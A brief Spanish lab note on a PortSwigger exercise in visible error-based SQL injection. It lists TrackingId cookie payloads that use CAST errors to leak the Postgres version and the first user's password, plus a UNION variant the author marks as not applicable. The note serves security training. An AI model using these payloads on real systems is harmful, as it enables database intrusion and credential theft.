13 - Visible error-based SQL injection
#sqli #errorbased #infodisclosure #portswigger
Postgres encontrado
R
TrackingId='+AND+1=CAST((SELECT+version()+FROM+users+LIMIT+1)+AS+int)--+-La contraseña del primer usuario se leakea con esta query
R
TrackingId='+AND+1=CAST((SELECT+password+FROM+users+LIMIT+1)+AS+int)--+-O de otra forma (NO APLICA)
R
TrackingId='+UNION+SELECT+1=CAST((SELECT+password+FROM+users+LIMIT+1)+AS+int)--+-